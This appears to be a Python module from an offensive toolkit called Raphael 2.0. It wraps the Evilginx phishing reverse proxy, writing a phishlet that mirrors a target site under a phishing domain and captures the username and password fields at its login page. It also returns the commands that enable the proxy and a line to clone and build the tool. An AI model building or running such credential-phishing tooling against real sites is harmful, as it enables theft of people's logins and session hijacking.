import json, os, subprocess

class EvilGinx:
    def __init__(self, binary: str = "evilginx", config_dir: str = "~/.evilginx"):
        self.binary = binary
        self.config_dir = os.path.expanduser(config_dir)
        self._available = any([
            os.path.isfile("/usr/local/bin/evilginx"),
            os.path.isfile("/usr/bin/evilginx"),
            os.path.isfile("/tmp/evilginx/evilginx"),
        ])

    def deploy_proxy(self, domain: str, phishing_url: str, target_url: str) -> dict:
        if not self._available:
            return {
                "status": "unavailable",
                "note": "EvilGinx not installed. Clone from https://github.com/kgretzky/evilginx2",
                "config": {
                    "domain": domain,
                    "phishing_url": phishing_url,
                    "target_url": target_url,
                    "phishlet_path": f"{self.config_dir}/phishlets/{domain}.yaml",
                },
                "installation": "git clone https://github.com/kgretzky/evilginx2 /tmp/evilginx && cd /tmp/evilginx && go build",
            }
        phishlet = {
            "name": domain,
            "author": "raphael-2.0",
            "min_evilginx_version": "3.0.0",
            "proxy_headers": {"X-Forwarded-For": "{remote_addr}"},
            "filters": [
                {"accepts": r"text/html.*"},
                {"replaces": {f"https://{target_url}": f"https://{phishing_url}"}},
            ],
            "triggers": [
                {"auth_url": f"https://{target_url}/login"},
                {"username_param": "username"},
                {"password_param": "password"},
            ],
        }
        phishlet_path = f"{self.config_dir}/phishlets/{domain}.yaml"
        os.makedirs(os.path.dirname(phishlet_path), exist_ok=True)
        with open(phishlet_path, "w") as f:
            f.write("# Auto-generated by Raphael 2.0\n")
            f.write(f"name: \"{domain}\"\n")
            f.write(f"author: \"raphael-2.0\"\n")
            f.write(f"proxy_headers:\n  X-Forwarded-For: \"{{remote_addr}}\"\n")
            f.write("triggers:\n")
            f.write(f"  - auth_url: \"https://{target_url}/login\"\n")
            f.write("    username_param: \"username\"\n")
            f.write("    password_param: \"password\"\n")

        return {
            "status": "configured",
            "phishlet": phishlet_path,
            "domain": domain,
            "phishing_url": phishing_url,
            "target_url": target_url,
            "commands": [
                f"{self.binary} config domain {domain}",
                f"{self.binary} config ip 0.0.0.0",
                f"{self.binary} phishlets hostname {domain} {phishing_url}",
                f"{self.binary} phishlets enable {domain}",
            ],
        }

    def status(self) -> dict:
        try:
            r = subprocess.run([self.binary, "status"], capture_output=True, text=True, timeout=5)
            return {"available": True, "output": r.stdout}
        except Exception:
            return {"available": self._available, "binary": self.binary}
